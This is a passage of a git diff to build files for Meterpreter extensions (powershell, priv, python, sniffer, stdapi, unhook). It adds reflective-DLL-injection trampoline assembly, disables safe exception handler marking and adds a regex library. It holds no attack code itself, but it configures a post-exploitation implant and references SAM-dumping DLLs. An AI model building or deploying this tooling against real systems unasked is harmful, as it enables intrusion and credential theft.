at end of file diff --git a/c/meterpreter/workspace/ext_server_powershell/CMakeLists.txt b/c/meterpreter/workspace/ext_server_powershell/CMakeLists.txt index 2112b8f0b..6753f1b78 100644 --- a/c/meterpreter/workspace/ext_server_powershell/CMakeLists.txt +++ b/c/meterpreter/workspace/ext_server_powershell/CMakeLists.txt @@ -25,7 +25,7 @@ set_target_properties(${PROJECT_NAME} PROPERTIES LINK_FLAGS "/DEF:\"${MOD_DEF_DI set_source_files_properties(${MOD_DEF_DIR}/extension.def PROPERTIES HEADER_FILE_ONLY TRUE) set(LINK_LIBS psapi ws2_32) -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() diff --git a/c/meterpreter/workspace/ext_server_powershell/ext_server_powershell.vcxproj b/c/meterpreter/workspace/ext_server_powershell/ext_server_powershell.vcxproj index 3e86f8957..3a7e798f7 100644 --- a/c/meterpreter/workspace/ext_server_powershell/ext_server_powershell.vcxproj +++ b/c/meterpreter/workspace/ext_server_powershell/ext_server_powershell.vcxproj @@ -153,6 +153,7 @@ <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -209,6 +210,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile> </ProgramDatabaseFile> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -264,6 +266,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -320,6 +323,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -377,6 +381,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile> </ProgramDatabaseFile> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -433,6 +438,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -453,6 +459,18 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <ClInclude Include="..\..\source\extensions\powershell\powershell_bridge.h" /> <ClInclude Include="..\..\source\extensions\powershell\powershell_runner.h" /> </ItemGroup> + <ItemGroup> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline32.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + </MASM> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline64.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + </MASM> + </ItemGroup> <Choose> <When Condition="'$(Platform)'=='Win32'" /> </Choose> @@ -460,4 +478,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <ImportGroup Label="ExtensionTargets"> <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" /> </ImportGroup> -</Project> +</Project> \ No newline at end of file diff --git a/c/meterpreter/workspace/ext_server_priv/CMakeLists.txt b/c/meterpreter/workspace/ext_server_priv/CMakeLists.txt index ab27c4516..da2fa9266 100644 --- a/c/meterpreter/workspace/ext_server_priv/CMakeLists.txt +++ b/c/meterpreter/workspace/ext_server_priv/CMakeLists.txt @@ -42,6 +42,10 @@ else() '-D__success=DISCARD' '-D__FUNCTION__=""' '-D__struct_bcount=DISCARD' + '-D__nullterminated=SAL__nullterminated' + '-D__in_range=__RPC__in_range' + '-D__callback=SAL__callback' + '-D__deref_in_bcount_opt=SAL__deref_in_bcount_opt' ) endif() @@ -68,7 +72,7 @@ if(MSVC) endif() set(LINK_LIBS psapi rpcrt4) -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() diff --git a/c/meterpreter/workspace/ext_server_priv/ext_server_priv.vcxproj b/c/meterpreter/workspace/ext_server_priv/ext_server_priv.vcxproj index f7d4d1a84..d005b53bb 100644 --- a/c/meterpreter/workspace/ext_server_priv/ext_server_priv.vcxproj +++ b/c/meterpreter/workspace/ext_server_priv/ext_server_priv.vcxproj @@ -170,6 +170,7 @@ <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <GenerateDebugInformation>false</GenerateDebugInformation> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <Bscmake> <SuppressStartupBanner>true</SuppressStartupBanner> @@ -243,6 +244,7 @@ msbuild.exe /target:Build /property:PlatformToolset=$(PlatformToolset);Configura <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <GenerateDebugInformation>false</GenerateDebugInformation> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <Bscmake> <SuppressStartupBanner>true</SuppressStartupBanner> @@ -316,6 +318,7 @@ msbuild.exe /target:Build /property:PlatformToolset=$(PlatformToolset);Configura <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <GenerateDebugInformation>false</GenerateDebugInformation> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <Bscmake> <SuppressStartupBanner>true</SuppressStartupBanner> @@ -389,6 +392,7 @@ msbuild.exe /target:Build /property:PlatformToolset=$(PlatformToolset);Configura <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <GenerateDebugInformation>false</GenerateDebugInformation> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <Bscmake> <SuppressStartupBanner>true</SuppressStartupBanner> @@ -461,6 +465,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <GenerateDebugInformation>false</GenerateDebugInformation> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <Bscmake> <SuppressStartupBanner>true</SuppressStartupBanner> @@ -533,6 +538,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <GenerateDebugInformation>false</GenerateDebugInformation> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <Bscmake> <SuppressStartupBanner>true</SuppressStartupBanner> @@ -603,8 +609,20 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <None Include="..\..\output\dump_sam.x64.dll" /> <None Include="..\..\output\dump_sam.x86.dll" /> </ItemGroup> + <ItemGroup> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline32.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + </MASM> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline64.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + </MASM> + </ItemGroup> <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> <ImportGroup Label="ExtensionTargets"> <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" /> </ImportGroup> -</Project> +</Project> \ No newline at end of file diff --git a/c/meterpreter/workspace/ext_server_python/CMakeLists.txt b/c/meterpreter/workspace/ext_server_python/CMakeLists.txt index ed6f16b36..8a6de2107 100644 --- a/c/meterpreter/workspace/ext_server_python/CMakeLists.txt +++ b/c/meterpreter/workspace/ext_server_python/CMakeLists.txt @@ -55,7 +55,7 @@ set(LINK_LIBS ${LIBRESSL_LIB_DIR}/tls-20.lib ) -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() diff --git a/c/meterpreter/workspace/ext_server_python/ext_server_python.vcxproj b/c/meterpreter/workspace/ext_server_python/ext_server_python.vcxproj index 6929a8b7c..a29adbdd6 100755 --- a/c/meterpreter/workspace/ext_server_python/ext_server_python.vcxproj +++ b/c/meterpreter/workspace/ext_server_python/ext_server_python.vcxproj @@ -152,6 +152,7 @@ <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -210,6 +211,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile> </ProgramDatabaseFile> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -267,6 +269,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -324,6 +327,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -382,6 +386,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile> </ProgramDatabaseFile> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -439,6 +444,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -811,9 +817,19 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'">true</ExcludedFromBuild> </MASM> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline32.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + </MASM> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline64.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + </MASM> </ItemGroup> <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> <ImportGroup Label="ExtensionTargets"> <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" /> </ImportGroup> -</Project> +</Project> \ No newline at end of file diff --git a/c/meterpreter/workspace/ext_server_python/ext_server_python.vcxproj.filters b/c/meterpreter/workspace/ext_server_python/ext_server_python.vcxproj.filters index e9ab9a205..ab90e5c43 100755 --- a/c/meterpreter/workspace/ext_server_python/ext_server_python.vcxproj.filters +++ b/c/meterpreter/workspace/ext_server_python/ext_server_python.vcxproj.filters @@ -1043,6 +1043,7 @@ <ClCompile Include="..\..\source\extensions\python\Modules\getbuildinfo.c"> <Filter>Modules</Filter> </ClCompile> + <ClCompile Include="..\..\source\logging\logging.c" /> </ItemGroup> <ItemGroup> <ResourceCompile Include="..\..\source\extensions\python\Resource Files\python_core.rc"> @@ -1058,5 +1059,7 @@ <MASM Include="..\..\source\extensions\python\Modules\_ctypes\libffi_msvc\win64.asm"> <Filter>Modules\_ctypes</Filter> </MASM> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline64.asm" /> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline32.asm" /> </ItemGroup> </Project> \ No newline at end of file diff --git a/c/meterpreter/workspace/ext_server_sniffer/CMakeLists.txt b/c/meterpreter/workspace/ext_server_sniffer/CMakeLists.txt index 366cf1039..6f4408066 100644 --- a/c/meterpreter/workspace/ext_server_sniffer/CMakeLists.txt +++ b/c/meterpreter/workspace/ext_server_sniffer/CMakeLists.txt @@ -38,7 +38,7 @@ if(IS_X64) endif() set(LINK_LIBS ${PSSDK_LIB_DIR}/pssdk_vc${PSSDK_VER}_mt.lib ws2_32) -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() diff --git a/c/meterpreter/workspace/ext_server_sniffer/ext_server_sniffer.vcxproj b/c/meterpreter/workspace/ext_server_sniffer/ext_server_sniffer.vcxproj index 8473e05af..9993531bf 100644 --- a/c/meterpreter/workspace/ext_server_sniffer/ext_server_sniffer.vcxproj +++ b/c/meterpreter/workspace/ext_server_sniffer/ext_server_sniffer.vcxproj @@ -140,6 +140,7 @@ <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <GenerateDebugInformation>false</GenerateDebugInformation> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <Bscmake> <SuppressStartupBanner>true</SuppressStartupBanner> @@ -207,6 +208,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <GenerateDebugInformation>false</GenerateDebugInformation> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <Bscmake> <SuppressStartupBanner>true</SuppressStartupBanner> @@ -273,6 +275,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <GenerateDebugInformation>false</GenerateDebugInformation> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <Bscmake> <SuppressStartupBanner>true</SuppressStartupBanner> @@ -339,6 +342,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <GenerateDebugInformation>false</GenerateDebugInformation> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <Bscmake> <SuppressStartupBanner>true</SuppressStartupBanner> @@ -360,6 +364,16 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <ClInclude Include="..\..\source\extensions\sniffer\precomp.h" /> <ClInclude Include="..\..\source\extensions\sniffer\sniffer.h" /> </ItemGroup> + <ItemGroup> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline32.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'">true</ExcludedFromBuild> + </MASM> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline64.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'">true</ExcludedFromBuild> + </MASM> + </ItemGroup> <Choose> <When Condition="'$(Platform)'=='Win32'" /> </Choose> @@ -367,4 +381,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <ImportGroup Label="ExtensionTargets"> <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" /> </ImportGroup> -</Project> +</Project> \ No newline at end of file diff --git a/c/meterpreter/workspace/ext_server_stdapi/CMakeLists.txt b/c/meterpreter/workspace/ext_server_stdapi/CMakeLists.txt index f783b441a..838f53c8c 100644 --- a/c/meterpreter/workspace/ext_server_stdapi/CMakeLists.txt +++ b/c/meterpreter/workspace/ext_server_stdapi/CMakeLists.txt @@ -22,6 +22,7 @@ include_directories(../../source/common) include_directories(../../source/jpeg-8) include_directories(../../source/ReflectiveDLLInjection/common) include_directories(../../source/extensions/stdapi/server) +include_directories(../../source/tiny-regex-c) set(SRC_DIR ../../source/extensions/stdapi) file(GLOB_RECURSE SRC_FILES @@ -29,6 +30,7 @@ file(GLOB_RECURSE SRC_FILES ${SRC_DIR}/*.cpp ${SRC_DIR}/*.rc ${MOD_DEF_DIR}/extension.def + ../../source/tiny-regex-c/*.c ) list(REMOVE_ITEM SRC_FILES ${CMAKE_CURRENT_SOURCE_DIR}/${SRC_DIR}/server/resource/hook.c) @@ -56,7 +58,7 @@ if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) # Post processing (required for all Meterpreter DLLs) editbin(${PROJECT_NAME} ${BIN_SUBSYSTEM}) diff --git a/c/meterpreter/workspace/ext_server_stdapi/ext_server_stdapi.vcxproj b/c/meterpreter/workspace/ext_server_stdapi/ext_server_stdapi.vcxproj index 238aa06ee..26e85ed1d 100644 --- a/c/meterpreter/workspace/ext_server_stdapi/ext_server_stdapi.vcxproj +++ b/c/meterpreter/workspace/ext_server_stdapi/ext_server_stdapi.vcxproj @@ -171,6 +171,7 @@ <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <GenerateDebugInformation>false</GenerateDebugInformation> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <Bscmake> <SuppressStartupBanner>true</SuppressStartupBanner> @@ -239,6 +240,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <GenerateDebugInformation>false</GenerateDebugInformation> <ProgramDatabaseFile> </ProgramDatabaseFile> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <Bscmake> <SuppressStartupBanner>true</SuppressStartupBanner> @@ -306,6 +308,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <GenerateDebugInformation>false</GenerateDebugInformation> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <Bscmake> <SuppressStartupBanner>true</SuppressStartupBanner> @@ -372,6 +375,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <GenerateDebugInformation>false</GenerateDebugInformation> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <Bscmake> <SuppressStartupBanner>true</SuppressStartupBanner> @@ -439,6 +443,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <GenerateDebugInformation>false</GenerateDebugInformation> <ProgramDatabaseFile> </ProgramDatabaseFile> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <Bscmake> <SuppressStartupBanner>true</SuppressStartupBanner> @@ -505,6 +510,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <GenerateDebugInformation>false</GenerateDebugInformation> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <Bscmake> <SuppressStartupBanner>true</SuppressStartupBanner> @@ -559,6 +565,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <ClCompile Include="..\..\source\extensions\stdapi\server\webcam\bmp2jpeg.c" /> <ClCompile Include="..\..\source\extensions\stdapi\server\webcam\webcam.cpp" /> <ClCompile Include="..\..\source\logging\logging.c" /> + <ClCompile Include="..\..\source\tiny-regex-c\re.c" /> </ItemGroup> <ItemGroup> <ResourceCompile Include="..\..\source\extensions\stdapi\server\resource\stdapi.rc" /> @@ -587,10 +594,23 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <ClInclude Include="..\..\source\extensions\stdapi\server\fs\fs.h" /> <ClInclude Include="..\..\source\extensions\stdapi\server\fs\fs_local.h" /> <ClInclude Include="..\..\source\extensions\stdapi\server\fs\search.h" /> + <ClInclude Include="..\..\source\tiny-regex-c\re.h" /> </ItemGroup> <ItemGroup> <None Include="..\..\source\extensions\stdapi\server\resource\hook.dll" /> </ItemGroup> + <ItemGroup> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline32.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + </MASM> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline64.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + </MASM> + </ItemGroup> <Choose> <When Condition="'$(Platform)'=='Win32'" /> </Choose> @@ -598,4 +618,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <ImportGroup Label="ExtensionTargets"> <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" /> </ImportGroup> -</Project> +</Project> \ No newline at end of file diff --git a/c/meterpreter/workspace/ext_server_unhook/CMakeLists.txt b/c/meterpreter/workspace/ext_server_unhook/CMakeLists.txt index 0f1b5e349..441903957 100644 --- a/c/meterpreter/workspace/ext_server_unhook/CMakeLists.txt +++ b/c/meterpreter/workspace/ext_server_unhook/CMakeLists.txt @@ -27,7 +27,7 @@ if(MSVC) set_source_files_properties(${MOD_DEF_DIR}/extension.def PROPERTIES HEADER_FILE_ONLY TRUE) endif() -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() diff --git a/c/meterpreter/workspace/ext_server_unhook/ext_server_unhook.vcxproj b/c/meterpreter/workspace/ext_server_unhook/ext_server_unhook.vcxproj index 085a3deb0..7b3cceace 100644 --- a/c/meterpreter/workspace/ext_server_unhook/ext_server_unhook.vcxproj +++ b/c/meterpreter/workspace/ext_server_unhook/ext_server_unhook.vcxproj @@ -152,6 +152,7 @@ <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + 